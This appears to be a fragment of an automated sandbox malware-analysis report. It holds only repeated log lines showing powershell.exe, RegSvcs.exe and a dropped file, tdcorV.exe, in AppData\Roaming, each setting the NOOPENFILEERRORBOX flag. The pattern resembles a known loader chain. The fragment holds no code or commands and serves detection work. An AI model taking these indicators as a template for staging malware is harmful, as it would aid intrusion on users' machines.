Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
